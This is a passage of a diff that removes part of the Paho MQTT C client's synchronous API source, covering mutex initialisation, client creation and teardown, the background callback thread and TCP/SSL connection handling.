- *    Ian Craggs - fix for bug 419233 - mutexes not reporting errors
- *    Ian Craggs - fix for bug 420851
- *    Ian Craggs - fix for bug 432903 - queue persistence
- *    Ian Craggs - MQTT 3.1.1 support
- *    Ian Craggs - fix for bug 438176 - MQTT version selection
- *    Rong Xiang, Ian Craggs - C++ compatibility
- *    Ian Craggs - fix for bug 443724 - stack corruption
- *    Ian Craggs - fix for bug 447672 - simultaneous access to socket structure
- *    Ian Craggs - fix for bug 459791 - deadlock in WaitForCompletion for bad client
- *    Ian Craggs - fix for bug 474905 - insufficient synchronization for subscribe, unsubscribe, connect
- *    Ian Craggs - make it clear that yield and receive are not intended for multi-threaded mode (bug 474748)
- *    Ian Craggs - SNI support, message queue unpersist bug
- *    Ian Craggs - binary will message support
- *    Ian Craggs - waitforCompletion fix #240
- *******************************************************************************/
-
-/**
- * @file
- * \brief Synchronous API implementation
- *
- */
-
-#define _GNU_SOURCE /* for pthread_mutexattr_settype */
-#include <stdlib.h>
-#include <string.h>
-#if !defined(WIN32) && !defined(WIN64)
-	#include <sys/time.h>
-#endif
-
-#include "MQTTClient.h"
-#if !defined(NO_PERSISTENCE)
-#include "MQTTPersistence.h"
-#endif
-
-#include "utf-8.h"
-#include "MQTTProtocol.h"
-#include "MQTTProtocolOut.h"
-#include "Thread.h"
-#include "SocketBuffer.h"
-#include "StackTrace.h"
-#include "Heap.h"
-
-#if defined(OPENSSL)
-#include <openssl/ssl.h>
-#else
-#define URI_SSL "ssl://"
-#endif
-
-#include "OsWrapper.h"
-
-#define URI_TCP "tcp://"
-
-#include "VersionInfo.h"
-
-
-const char *client_timestamp_eye = "MQTTClientV3_Timestamp " BUILD_TIMESTAMP;
-const char *client_version_eye = "MQTTClientV3_Version " CLIENT_VERSION;
-
-void MQTTClient_global_init(MQTTClient_init_options* inits)
-{
-#if defined(OPENSSL)
-	SSLSocket_handleOpensslInit(inits->do_openssl_init);
-#endif
-}
-
-static ClientStates ClientState =
-{
-	CLIENT_VERSION, /* version */
-	NULL /* client list */
-};
-
-ClientStates* bstate = &ClientState;
-
-MQTTProtocol state;
-
-#if defined(WIN32) || defined(WIN64)
-static mutex_type mqttclient_mutex = NULL;
-static mutex_type socket_mutex = NULL;
-static mutex_type subscribe_mutex = NULL;
-static mutex_type unsubscribe_mutex = NULL;
-static mutex_type connect_mutex = NULL;
-extern mutex_type stack_mutex;
-extern mutex_type heap_mutex;
-extern mutex_type log_mutex;
-BOOL APIENTRY DllMain(HANDLE hModule,
-					  DWORD  ul_reason_for_call,
-					  LPVOID lpReserved)
-{
-	switch (ul_reason_for_call)
-	{
-		case DLL_PROCESS_ATTACH:
-			Log(TRACE_MAX, -1, "DLL process attach");
-			if (mqttclient_mutex == NULL)
-			{
-				mqttclient_mutex = CreateMutex(NULL, 0, NULL);
-				subscribe_mutex = CreateMutex(NULL, 0, NULL);
-				unsubscribe_mutex = CreateMutex(NULL, 0, NULL);
-				connect_mutex = CreateMutex(NULL, 0, NULL);
-				stack_mutex = CreateMutex(NULL, 0, NULL);
-				heap_mutex = CreateMutex(NULL, 0, NULL);
-				log_mutex = CreateMutex(NULL, 0, NULL);
-				socket_mutex = CreateMutex(NULL, 0, NULL);
-			}
-		case DLL_THREAD_ATTACH:
-			Log(TRACE_MAX, -1, "DLL thread attach");
-		case DLL_THREAD_DETACH:
-			Log(TRACE_MAX, -1, "DLL thread detach");
-		case DLL_PROCESS_DETACH:
-			Log(TRACE_MAX, -1, "DLL process detach");
-	}
-	return TRUE;
-}
-#else
-static pthread_mutex_t mqttclient_mutex_store = PTHREAD_MUTEX_INITIALIZER;
-static mutex_type mqttclient_mutex = &mqttclient_mutex_store;
-
-static pthread_mutex_t socket_mutex_store = PTHREAD_MUTEX_INITIALIZER;
-static mutex_type socket_mutex = &socket_mutex_store;
-
-static pthread_mutex_t subscribe_mutex_store = PTHREAD_MUTEX_INITIALIZER;
-static mutex_type subscribe_mutex = &subscribe_mutex_store;
-
-static pthread_mutex_t unsubscribe_mutex_store = PTHREAD_MUTEX_INITIALIZER;
-static mutex_type unsubscribe_mutex = &unsubscribe_mutex_store;
-
-static pthread_mutex_t connect_mutex_store = PTHREAD_MUTEX_INITIALIZER;
-static mutex_type connect_mutex = &connect_mutex_store;
-
-void MQTTClient_init(void)
-{
-	pthread_mutexattr_t attr;
-	int rc;
-
-	pthread_mutexattr_init(&attr);
-#if !defined(_WRS_KERNEL)
-	pthread_mutexattr_settype(&attr, PTHREAD_MUTEX_ERRORCHECK);
-#else
-	/* #warning "no pthread_mutexattr_settype" */
-#endif /* !defined(_WRS_KERNEL) */
-	if ((rc = pthread_mutex_init(mqttclient_mutex, &attr)) != 0)
-		printf("MQTTClient: error %d initializing client_mutex\n", rc);
-	if ((rc = pthread_mutex_init(socket_mutex, &attr)) != 0)
-		printf("MQTTClient: error %d initializing socket_mutex\n", rc);
-	if ((rc = pthread_mutex_init(subscribe_mutex, &attr)) != 0)
-		printf("MQTTClient: error %d initializing subscribe_mutex\n", rc);
-	if ((rc = pthread_mutex_init(unsubscribe_mutex, &attr)) != 0)
-		printf("MQTTClient: error %d initializing unsubscribe_mutex\n", rc);
-	if ((rc = pthread_mutex_init(connect_mutex, &attr)) != 0)
-		printf("MQTTClient: error %d initializing connect_mutex\n", rc);
-}
-
-#define WINAPI
-#endif
-
-static volatile int initialized = 0;
-static List* handles = NULL;
-static int running = 0;
-static int tostop = 0;
-static thread_id_type run_id = 0;
-
-typedef struct
-{
-	MQTTClient_message* msg;
-	char* topicName;
-	int topicLen;
-	unsigned int seqno; /* only used on restore */
-} qEntry;
-
-
-typedef struct
-{
-	char* serverURI;
-#if defined(OPENSSL)
-	int ssl;
-#endif
-	Clients* c;
-	MQTTClient_connectionLost* cl;
-	MQTTClient_messageArrived* ma;
-	MQTTClient_deliveryComplete* dc;
-	void* context;
-
-	sem_type connect_sem;
-	int rc; /* getsockopt return code in connect */
-	sem_type connack_sem;
-	sem_type suback_sem;
-	sem_type unsuback_sem;
-	MQTTPacket* pack;
-
-} MQTTClients;
-
-void MQTTClient_sleep(long milliseconds)
-{
-	FUNC_ENTRY;
-#if defined(WIN32) || defined(WIN64)
-	Sleep(milliseconds);
-#else
-	usleep(milliseconds*1000);
-#endif
-	FUNC_EXIT;
-}
-
-
-#if defined(WIN32) || defined(WIN64)
-#define START_TIME_TYPE DWORD
-START_TIME_TYPE MQTTClient_start_clock(void)
-{
-	return GetTickCount();
-}
-#elif defined(AIX)
-#define START_TIME_TYPE struct timespec
-START_TIME_TYPE MQTTClient_start_clock(void)
-{
-	static struct timespec start;
-	clock_gettime(CLOCK_REALTIME, &start);
-	return start;
-}
-#else
-#define START_TIME_TYPE struct timeval
-START_TIME_TYPE MQTTClient_start_clock(void)
-{
-	static struct timeval start;
-	gettimeofday(&start, NULL);
-	return start;
-}
-#endif
-
-
-#if defined(WIN32) || defined(WIN64)
-long MQTTClient_elapsed(DWORD milliseconds)
-{
-	return GetTickCount() - milliseconds;
-}
-#elif defined(AIX)
-#define assert(a)
-long MQTTClient_elapsed(struct timespec start)
-{
-	struct timespec now, res;
-
-	clock_gettime(CLOCK_REALTIME, &now);
-	ntimersub(now, start, res);
-	return (res.tv_sec)*1000L + (res.tv_nsec)/1000000L;
-}
-#else
-long MQTTClient_elapsed(struct timeval start)
-{
-	struct timeval now, res;
-
-	gettimeofday(&now, NULL);
-	timersub(&now, &start, &res);
-	return (res.tv_sec)*1000 + (res.tv_usec)/1000;
-}
-#endif
-
-static void MQTTClient_terminate(void);
-static void MQTTClient_emptyMessageQueue(Clients* client);
-static int MQTTClient_deliverMessage(
-		int rc, MQTTClients* m,
-		char** topicName, int* topicLen,
-		MQTTClient_message** message);
-static int clientSockCompare(void* a, void* b);
-static thread_return_type WINAPI connectionLost_call(void* context);
-static thread_return_type WINAPI MQTTClient_run(void* n);
-static void MQTTClient_stop(void);
-static void MQTTClient_closeSession(Clients* client);
-static int MQTTClient_cleanSession(Clients* client);
-static int MQTTClient_connectURIVersion(
-	MQTTClient handle, MQTTClient_connectOptions* options,
-	const char* serverURI, int MQTTVersion,
-	START_TIME_TYPE start, long millisecsTimeout);
-static int MQTTClient_connectURI(MQTTClient handle, MQTTClient_connectOptions* options, const char* serverURI);
-static int MQTTClient_disconnect1(MQTTClient handle, int timeout, int internal, int stop);
-static int MQTTClient_disconnect_internal(MQTTClient handle, int timeout);
-static void MQTTClient_retry(void);
-static MQTTPacket* MQTTClient_cycle(int* sock, unsigned long timeout, int* rc);
-static MQTTPacket* MQTTClient_waitfor(MQTTClient handle, int packet_type, int* rc, long timeout);
-/*static int pubCompare(void* a, void* b); */
-static void MQTTProtocol_checkPendingWrites(void);
-static void MQTTClient_writeComplete(int socket);
-
-
-int MQTTClient_create(MQTTClient* handle, const char* serverURI, const char* clientId,
-		int persistence_type, void* persistence_context)
-{
-	int rc = 0;
-	MQTTClients *m = NULL;
-
-	FUNC_ENTRY;
-	rc = Thread_lock_mutex(mqttclient_mutex);
-
-	if (serverURI == NULL || clientId == NULL)
-	{
-		rc = MQTTCLIENT_NULL_PARAMETER;
-		goto exit;
-	}
-
-	if (!UTF8_validateString(clientId))
-	{
-		rc = MQTTCLIENT_BAD_UTF8_STRING;
-		goto exit;
-	}
-
-	if (!initialized)
-	{
-		#if defined(HEAP_H)
-			Heap_initialize();
-		#endif
-		Log_initialize((Log_nameValue*)MQTTClient_getVersionInfo());
-		bstate->clients = ListInitialize();
-		Socket_outInitialize();
-		Socket_setWriteCompleteCallback(MQTTClient_writeComplete);
-		handles = ListInitialize();
-#if defined(OPENSSL)
-		SSLSocket_initialize();
-#endif
-		initialized = 1;
-	}
-	m = malloc(sizeof(MQTTClients));
-	*handle = m;
-	memset(m, '\0', sizeof(MQTTClients));
-	if (strncmp(URI_TCP, serverURI, strlen(URI_TCP)) == 0)
-		serverURI += strlen(URI_TCP);
-	else if (strncmp(URI_SSL, serverURI, strlen(URI_SSL)) == 0)
-	{
-#if defined(OPENSSL)
-		serverURI += strlen(URI_SSL);
-		m->ssl = 1;
-#else
-        rc = MQTTCLIENT_SSL_NOT_SUPPORTED;
-        goto exit;
-#endif
-	}
-	m->serverURI = MQTTStrdup(serverURI);
-	ListAppend(handles, m, sizeof(MQTTClients));
-
-	m->c = malloc(sizeof(Clients));
-	memset(m->c, '\0', sizeof(Clients));
-	m->c->context = m;
-	m->c->outboundMsgs = ListInitialize();
-	m->c->inboundMsgs = ListInitialize();
-	m->c->messageQueue = ListInitialize();
-	m->c->clientID = MQTTStrdup(clientId);
-	m->connect_sem = Thread_create_sem();
-	m->connack_sem = Thread_create_sem();
-	m->suback_sem = Thread_create_sem();
-	m->unsuback_sem = Thread_create_sem();
-
-#if !defined(NO_PERSISTENCE)
-	rc = MQTTPersistence_create(&(m->c->persistence), persistence_type, persistence_context);
-	if (rc == 0)
-	{
-		rc = MQTTPersistence_initialize(m->c, m->serverURI);
-		if (rc == 0)
-			MQTTPersistence_restoreMessageQueue(m->c);
-	}
-#endif
-	ListAppend(bstate->clients, m->c, sizeof(Clients) + 3*sizeof(List));
-
-exit:
-	Thread_unlock_mutex(mqttclient_mutex);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-static void MQTTClient_terminate(void)
-{
-	FUNC_ENTRY;
-	MQTTClient_stop();
-	if (initialized)
-	{
-		ListFree(bstate->clients);
-		ListFree(handles);
-		handles = NULL;
-		Socket_outTerminate();
-#if defined(OPENSSL)
-		SSLSocket_terminate();
-#endif
-		#if defined(HEAP_H)
-			Heap_terminate();
-		#endif
-		Log_terminate();
-		initialized = 0;
-	}
-	FUNC_EXIT;
-}
-
-
-static void MQTTClient_emptyMessageQueue(Clients* client)
-{
-	FUNC_ENTRY;
-	/* empty message queue */
-	if (client->messageQueue->count > 0)
-	{
-		ListElement* current = NULL;
-		while (ListNextElement(client->messageQueue, &current))
-		{
-			qEntry* qe = (qEntry*)(current->content);
-			free(qe->topicName);
-			free(qe->msg->payload);
-			free(qe->msg);
-		}
-		ListEmpty(client->messageQueue);
-	}
-	FUNC_EXIT;
-}
-
-
-void MQTTClient_destroy(MQTTClient* handle)
-{
-	MQTTClients* m = *handle;
-
-	FUNC_ENTRY;
-	Thread_lock_mutex(mqttclient_mutex);
-
-	if (m == NULL)
-		goto exit;
-
-	if (m->c)
-	{
-		int saved_socket = m->c->net.socket;
-		char* saved_clientid = MQTTStrdup(m->c->clientID);
-#if !defined(NO_PERSISTENCE)
-		MQTTPersistence_close(m->c);
-#endif
-		MQTTClient_emptyMessageQueue(m->c);
-		MQTTProtocol_freeClient(m->c);
-		if (!ListRemove(bstate->clients, m->c))
-			Log(LOG_ERROR, 0, NULL);
-		else
-			Log(TRACE_MIN, 1, NULL, saved_clientid, saved_socket);
-		free(saved_clientid);
-	}
-	if (m->serverURI)
-		free(m->serverURI);
-	Thread_destroy_sem(m->connect_sem);
-	Thread_destroy_sem(m->connack_sem);
-	Thread_destroy_sem(m->suback_sem);
-	Thread_destroy_sem(m->unsuback_sem);
-	if (!ListRemove(handles, m))
-		Log(LOG_ERROR, -1, "free error");
-	*handle = NULL;
-	if (bstate->clients->count == 0)
-		MQTTClient_terminate();
-
-exit:
-	Thread_unlock_mutex(mqttclient_mutex);
-	FUNC_EXIT;
-}
-
-
-void MQTTClient_freeMessage(MQTTClient_message** message)
-{
-	FUNC_ENTRY;
-	free((*message)->payload);
-	free(*message);
-	*message = NULL;
-	FUNC_EXIT;
-}
-
-
-void MQTTClient_free(void* memory)
-{
-	FUNC_ENTRY;
-	free(memory);
-	FUNC_EXIT;
-}
-
-
-static int MQTTClient_deliverMessage(int rc, MQTTClients* m, char** topicName, int* topicLen, MQTTClient_message** message)
-{
-	qEntry* qe = (qEntry*)(m->c->messageQueue->first->content);
-
-	FUNC_ENTRY;
-	*message = qe->msg;
-	*topicName = qe->topicName;
-	*topicLen = qe->topicLen;
-	if (strlen(*topicName) != *topicLen)
-		rc = MQTTCLIENT_TOPICNAME_TRUNCATED;
-#if !defined(NO_PERSISTENCE)
-	if (m->c->persistence)
-		MQTTPersistence_unpersistQueueEntry(m->c, (MQTTPersistence_qEntry*)qe);
-#endif
-	ListRemove(m->c->messageQueue, m->c->messageQueue->first->content);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/**
- * List callback function for comparing clients by socket
- * @param a first integer value
- * @param b second integer value
- * @return boolean indicating whether a and b are equal
- */
-static int clientSockCompare(void* a, void* b)
-{
-	MQTTClients* m = (MQTTClients*)a;
-	return m->c->net.socket == *(int*)b;
-}
-
-
-/**
- * Wrapper function to call connection lost on a separate thread.  A separate thread is needed to allow the
- * connectionLost function to make API calls (e.g. connect)
- * @param context a pointer to the relevant client
- * @return thread_return_type standard thread return value - not used here
- */
-static thread_return_type WINAPI connectionLost_call(void* context)
-{
-	MQTTClients* m = (MQTTClients*)context;
-
-	(*(m->cl))(m->context, NULL);
-	return 0;
-}
-
-
-/* This is the thread function that handles the calling of callback functions if set */
-static thread_return_type WINAPI MQTTClient_run(void* n)
-{
-	long timeout = 10L; /* first time in we have a small timeout.  Gets things started more quickly */
-
-	FUNC_ENTRY;
-	running = 1;
-	run_id = Thread_getid();
-
-	Thread_lock_mutex(mqttclient_mutex);
-	while (!tostop)
-	{
-		int rc = SOCKET_ERROR;
-		int sock = -1;
-		MQTTClients* m = NULL;
-		MQTTPacket* pack = NULL;
-
-		Thread_unlock_mutex(mqttclient_mutex);
-		pack = MQTTClient_cycle(&sock, timeout, &rc);
-		Thread_lock_mutex(mqttclient_mutex);
-		if (tostop)
-			break;
-		timeout = 1000L;
-
-		/* find client corresponding to socket */
-		if (ListFindItem(handles, &sock, clientSockCompare) == NULL)
-		{
-			/* assert: should not happen */
-			continue;
-		}
-		m = (MQTTClient)(handles->current->content);
-		if (m == NULL)
-		{
-			/* assert: should not happen */
-			continue;
-		}
-		if (rc == SOCKET_ERROR)
-		{
-			if (m->c->connected)
-				MQTTClient_disconnect_internal(m, 0);
-			else
-			{
-				if (m->c->connect_state == 2 && !Thread_check_sem(m->connect_sem))
-				{
-					Log(TRACE_MIN, -1, "Posting connect semaphore for client %s", m->c->clientID);
-					Thread_post_sem(m->connect_sem);
-				}
-				if (m->c->connect_state == 3 && !Thread_check_sem(m->connack_sem))
-				{
-					Log(TRACE_MIN, -1, "Posting connack semaphore for client %s", m->c->clientID);
-					Thread_post_sem(m->connack_sem);
-				}
-			}
-		}
-		else
-		{
-			if (m->c->messageQueue->count > 0)
-			{
-				qEntry* qe = (qEntry*)(m->c->messageQueue->first->content);
-				int topicLen = qe->topicLen;
-
-				if (strlen(qe->topicName) == topicLen)
-					topicLen = 0;
-
-				Log(TRACE_MIN, -1, "Calling messageArrived for client %s, queue depth %d",
-					m->c->clientID, m->c->messageQueue->count);
-				Thread_unlock_mutex(mqttclient_mutex);
-				rc = (*(m->ma))(m->context, qe->topicName, topicLen, qe->msg);
-				Thread_lock_mutex(mqttclient_mutex);
-				/* if 0 (false) is returned by the callback then it failed, so we don't remove the message from
-				 * the queue, and it will be retried later.  If 1 is returned then the message data may have been freed,
-				 * so we must be careful how we use it.
-				 */
-				if (rc)
-				{
-					#if !defined(NO_PERSISTENCE)
-					if (m->c->persistence)
-						MQTTPersistence_unpersistQueueEntry(m->c, (MQTTPersistence_qEntry*)qe);
-					#endif
-					ListRemove(m->c->messageQueue, qe);
-				}
-				else
-					Log(TRACE_MIN, -1, "False returned from messageArrived for client %s, message remains on queue",
-						m->c->clientID);
-			}
-			if (pack)
-			{
-				if (pack->header.bits.type == CONNACK && !Thread_check_sem(m->connack_sem))
-				{
-					Log(TRACE_MIN, -1, "Posting connack semaphore for client %s", m->c->clientID);
-					m->pack = pack;
-					Thread_post_sem(m->connack_sem);
-				}
-				else if (pack->header.bits.type == SUBACK)
-				{
-					Log(TRACE_MIN, -1, "Posting suback semaphore for client %s", m->c->clientID);
-					m->pack = pack;
-					Thread_post_sem(m->suback_sem);
-				}
-				else if (pack->header.bits.type == UNSUBACK)
-				{
-					Log(TRACE_MIN, -1, "Posting unsuback semaphore for client %s", m->c->clientID);
-					m->pack = pack;
-					Thread_post_sem(m->unsuback_sem);
-				}
-			}
-			else if (m->c->connect_state == 1 && !Thread_check_sem(m->connect_sem))
-			{
-				int error;
-				socklen_t len = sizeof(error);
-
-				if ((m->rc = getsockopt(m->c->net.socket, SOL_SOCKET, SO_ERROR, (char*)&error, &len)) == 0)
-					m->rc = error;
-				Log(TRACE_MIN, -1, "Posting connect semaphore for client %s rc %d", m->c->clientID, m->rc);
-				Thread_post_sem(m->connect_sem);
-			}
-#if defined(OPENSSL)
-			else if (m->c->connect_state == 2 && !Thread_check_sem(m->connect_sem))
-			{
-				rc = SSLSocket_connect(m->c->net.ssl, m->c->net.socket);
-				if (rc == 1 || rc == SSL_FATAL)
-				{
-					if (rc == 1 && !m->c->cleansession && m->c->session == NULL)
-						m->c->session = SSL_get1_session(m->c->net.ssl);
-					m->rc = rc;
-					Log(TRACE_MIN, -1, "Posting connect semaphore for SSL client %s rc %d", m->c->clientID, m->rc);
-					Thread_post_sem(m->connect_sem);
-				}
-			}
-#endif
-		}
-	}
-	run_id = 0;
-	running = tostop = 0;
-	Thread_unlock_mutex(mqttclient_mutex);
-	FUNC_EXIT;
-	return 0;
-}
-
-
-static void MQTTClient_stop(void)
-{
-	int rc = 0;
-
-	FUNC_ENTRY;
-	if (running == 1 && tostop == 0)
-	{
-		int conn_count = 0;
-		ListElement* current = NULL;
-
-		if (handles != NULL)
-		{
-			/* find out how many handles are still connected */
-			while (ListNextElement(handles, &current))
-			{
-				if (((MQTTClients*)(current->content))->c->connect_state > 0 ||
-						((MQTTClients*)(current->content))->c->connected)
-					++conn_count;
-			}
-		}
-		Log(TRACE_MIN, -1, "Conn_count is %d", conn_count);
-		/* stop the background thread, if we are the last one to be using it */
-		if (conn_count == 0)
-		{
-			int count = 0;
-			tostop = 1;
-			if (Thread_getid() != run_id)
-			{
-				while (running && ++count < 100)
-				{
-					Thread_unlock_mutex(mqttclient_mutex);
-					Log(TRACE_MIN, -1, "sleeping");
-					MQTTClient_sleep(100L);
-					Thread_lock_mutex(mqttclient_mutex);
-				}
-			}
-			rc = 1;
-		}
-	}
-	FUNC_EXIT_RC(rc);
-}
-
-
-int MQTTClient_setCallbacks(MQTTClient handle, void* context, MQTTClient_connectionLost* cl,
-														MQTTClient_messageArrived* ma, MQTTClient_deliveryComplete* dc)
-{
-	int rc = MQTTCLIENT_SUCCESS;
-	MQTTClients* m = handle;
-
-	FUNC_ENTRY;
-	Thread_lock_mutex(mqttclient_mutex);
-
-	if (m == NULL || ma == NULL || m->c->connect_state != 0)
-		rc = MQTTCLIENT_FAILURE;
-	else
-	{
-		m->context = context;
-		m->cl = cl;
-		m->ma = ma;
-		m->dc = dc;
-	}
-
-	Thread_unlock_mutex(mqttclient_mutex);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-static void MQTTClient_closeSession(Clients* client)
-{
-	FUNC_ENTRY;
-	client->good = 0;
-	client->ping_outstanding = 0;
-	if (client->net.socket > 0)
-	{
-		if (client->connected)
-			MQTTPacket_send_disconnect(&client->net, client->clientID);
-		Thread_lock_mutex(socket_mutex);
-#if defined(OPENSSL)
-		SSLSocket_close(&client->net);
-#endif
-		Socket_close(client->net.socket);
-		Thread_unlock_mutex(socket_mutex);
-		client->net.socket = 0;
-#if defined(OPENSSL)
-		client->net.ssl = NULL;
-#endif
-	}
-	client->connected = 0;
-	client->connect_state = 0;
-
-	if (client->cleansession)
-		MQTTClient_cleanSession(client);
-	FUNC_EXIT;
-}
-
-
-static int MQTTClient_cleanSession(Clients* client)
-{
-	int rc = 0;
-
-	FUNC_ENTRY;
-#if !defined(NO_PERSISTENCE)
-	rc = MQTTPersistence_clear(client);
-#endif
-	MQTTProtocol_emptyMessageList(client->inboundMsgs);
-	MQTTProtocol_emptyMessageList(client->outboundMsgs);
-	MQTTClient_emptyMessageQueue(client);
-	client->msgID = 0;
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-void Protocol_processPublication(Publish* publish, Clients* client)
-{
-	qEntry* qe = NULL;
-	MQTTClient_message* mm = NULL;
-
-	FUNC_ENTRY;
-	qe = malloc(sizeof(qEntry));
-	mm = malloc(sizeof(MQTTClient_message));
-
-	qe->msg = mm;
-
-	qe->topicName = publish->topic;
-	qe->topicLen = publish->topiclen;
-	publish->topic = NULL;
-
-	/* If the message is QoS 2, then we have already stored the incoming payload
-	 * in an allocated buffer, so we don't need to copy again.
-	 */
-	if (publish->header.bits.qos == 2)
-		mm->payload = publish->payload;
-	else
-	{
-		mm->payload = malloc(publish->payloadlen);
-		memcpy(mm->payload, publish->payload, publish->payloadlen);
-	}
-
-	mm->payloadlen = publish->payloadlen;
-	mm->qos = publish->header.bits.qos;
-	mm->retained = publish->header.bits.retain;
-	if (publish->header.bits.qos == 2)
-		mm->dup = 0;  /* ensure that a QoS2 message is not passed to the application with dup = 1 */
-	else
-		mm->dup = publish->header.bits.dup;
-	mm->msgid = publish->msgId;
-
-	ListAppend(client->messageQueue, qe, sizeof(qe) + sizeof(mm) + mm->payloadlen + strlen(qe->topicName)+1);
-#if !defined(NO_PERSISTENCE)
-	if (client->persistence)
-		MQTTPersistence_persistQueueEntry(client, (MQTTPersistence_qEntry*)qe);
-#endif
-	FUNC_EXIT;
-}
-
-
-static int MQTTClient_connectURIVersion(MQTTClient handle, MQTTClient_connectOptions* options, const char* serverURI, int MQTTVersion,
-	START_TIME_TYPE start, long millisecsTimeout)
-{
-	MQTTClients* m = handle;
-	int rc = SOCKET_ERROR;
-	int sessionPresent = 0;
-
-	FUNC_ENTRY;
-	if (m->ma && !running)
-	{
-		Thread_start(MQTTClient_run, handle);
-		if (MQTTClient_elapsed(start) >= millisecsTimeout)
-		{
-			rc = SOCKET_ERROR;
-			goto exit;
-		}
-		MQTTClient_sleep(100L);
-	}
-
-	Log(TRACE_MIN, -1, "Connecting to serverURI %s with MQTT version %d", serverURI, MQTTVersion);
-#if defined(OPENSSL)
-	rc = MQTTProtocol_connect(serverURI, m->c, m->ssl, MQTTVersion);
-#else
-	rc = MQTTProtocol_connect(serverURI, m->c, MQTTVersion);
-#endif
-	if (rc == SOCKET_ERROR)
-		goto exit;
-
-	if (m->c->connect_state == 0)
-	{
-		rc = SOCKET_ERROR;
-		goto exit;
-	}
-
-	if (m->c->connect_state == 1) /* TCP connect started - wait for completion */
-	{
-		Thread_unlock_mutex(mqttclient_mutex);
-		MQTTClient_waitfor(handle, CONNECT, &rc, millisecsTimeout - MQTTClient_elapsed(start));
-		Thread_lock_mutex(mqttclient_mutex);
-		if (rc != 0)
-		{
-			rc = SOCKET_ERROR;
-			goto exit;
-		}
-
-#if defined(OPENSSL)
-		if (m->ssl)
-		{
-			int port;
-			char* hostname;
-			int setSocketForSSLrc = 0;
-
-			hostname = MQTTProtocol_addressPort(m->serverURI, &port);
-			setSocketForSSLrc = SSLSocket_setSocketForSSL(&m->c->net, m->c->sslopts, hostname);
-			if (hostname != m->serverURI)
-				free(hostname);
-
-			if (setSocketForSSLrc != MQTTCLIENT_SUCCESS)
-			{
-				if (m->c->session != NULL)
-					if ((rc = SSL_set_session(m->c->net.ssl, m->c->session)) != 1)
-						Log(TRACE_MIN, -1, "Failed to set SSL session with stored data, non critical");
-				rc = SSLSocket_connect(m->c->net.ssl, m->c->net.socket);
-				if (rc == TCPSOCKET_INTERRUPTED)
-					m->c->connect_state = 2;  /* the connect is still in progress */
-				else if (rc == SSL_FATAL)
-				{
-					rc = SOCKET_ERROR;
-					goto exit;
-				}
-				else if (rc == 1)
-				{
-					rc = MQTTCLIENT_SUCCESS;
-					m->c->connect_state = 3;
-					if (MQTTPacket_send_connect(m->c, MQTTVersion) == SOCKET_ERROR)
-					{
-						rc = SOCKET_ERROR;
-						goto exit;
-					}
-					if (!m->c->cleansession && m->c->session == NULL)
-						m->c->session = SSL_get1_session(m->c->net.ssl);
-				}
-			}
-			else
-			{
-				rc = SOCKET_ERROR;
-				goto exit;
-			}
-		}
-		else
-		{
-#endif
-			m->c->connect_state = 3; /* TCP connect completed, in which case send the MQTT connect packet */
-			if (MQTTPacket_send_connect(m->c, MQTTVersion) == SOCKET_ERROR)
-			{
-				rc = SOCKET_ERROR;
-				goto exit;
-			}
-#if defined(OPENSSL)
-		}
-#endif
-	}
-
-#if defined(OPENSSL)
-	if (m->c->connect_state == 2) /* SSL connect sent - wait for completion */
-	{
-		Thread_unlock_mutex(mqttclient_mutex);
-		MQTTClient_waitfor(handle, CONNECT, &rc, millisecsTimeout - MQTTClient_elapsed(start));
-		Thread_lock_mutex(mqttclient_mutex);
-		if (rc != 1)
-		{
-			rc = SOCKET_ERROR;
-			goto exit;
-		}
-		if(!m->c->cleansession && m->c->session == NULL)
-			m->c->session = SSL_get1_session(m->c->net.ssl);
-		m->c->connect_state = 3; /* TCP connect completed, in which case send the MQTT connect packet */
-		if (MQTTPacket_send_connect(m->c, MQTTVersion) == SOCKET_ERROR)
-		{
-			rc = SOCKET_ERROR;
-			goto exit;
-		}
-	}
-#endif
-
-	if (m->c->connect_state == 3) /* MQTT connect sent - wait for CONNACK */
-	{
-		MQTTPacket* pack = NULL;
-
-		Thread_unlock_mutex(mqttclient_mutex);
-		pack = MQTTClient_waitfor(handle, CONNACK, &rc, millisecsTimeout - MQTTClient_elapsed(start));
-		Thread_lock_mutex(mqttclient_mutex);
-		if (pack == NULL)
-			rc = SOCKET_ERROR;
-		else
-		{
-			Connack* connack = (Connack*)pack;
-			Log(TRACE_PROTOCOL, 1, NULL, m->c->net.socket, m->c->clientID, connack->rc);
-			if ((rc = connack->rc) == MQTTCLIENT_SUCCESS)
-			{
-				m->c->connected = 1;
-				m->c->good = 1;
-				m->c->connect_state = 0;
-				if (MQTTVersion == 4)
-					sessionPresent = connack->flags.bits.sessionPresent;
-				if (m->c->cleansession)
-					rc = MQTTClient_cleanSession(m->c);
-				if (m->c->outboundMsgs->count > 0)
-				{
-					ListElement* outcurrent = NULL;
-
-					while (ListNextElement(m->c->outboundMsgs, &outcurrent))
-					{
-						Messages* m = (Messages*)(outcurrent->content);
-						m->lastTouch = 0;
-					}
-					MQTTProtocol_retry((time_t)0, 1, 1);
-					if (m->c->connected != 1)
-						rc = MQTTCLIENT_DISCONNECTED;
-				}
-			}
-			free(connack);
-			m->pack = NULL;
-		}
-	}
-exit:
-	if (rc == MQTTCLIENT_SUCCESS)
-	{
-		if (options->struct_version == 4) /* means we have to fill out return values */
-		{
-			options->returned.serverURI = serverURI;
-			options->returned.MQTTVersion = MQTTVersion;
-			options->returned.sessionPresent = sessionPresent;
-		}
-	}
-	else
-		MQTTClient_disconnect1(handle, 0, 0, (MQTTVersion == 3)); /* don't want to call connection lost */
-	FUNC_EXIT_RC(rc);
-  return rc;
-}
-
-static int retryLoopInterval = 5;
-
-static void setRetryLoopInterval(int keepalive)
-{
-	int proposed = keepalive / 10;
-
-	if (proposed < 1)
-		proposed = 1;
-	else if (proposed > 5)
-		proposed = 5;
-	if (proposed < retryLoopInterval)
-		retryLoopInterval = proposed;
-}
-
-
-static int MQTTClient_connectURI(MQTTClient handle, MQTTClient_connectOptions* options, const char* serverURI)
-{
-	MQTTClients* m = handle;
-	START_TIME_TYPE start;
-	long millisecsTimeout = 30000L;
-	int rc = SOCKET_ERROR;
-	int MQTTVersion = 0;
-
-	FUNC_ENTRY;
-	millisecsTimeout = options->connectTimeout * 1000;
-	start = MQTTClient_start_clock();
-
-	m->c->keepAliveInterval = options->keepAliveInterval;
-	setRetryLoopInterval(options->keepAliveInterval);
-	m->c->cleansession = options->cleansession;
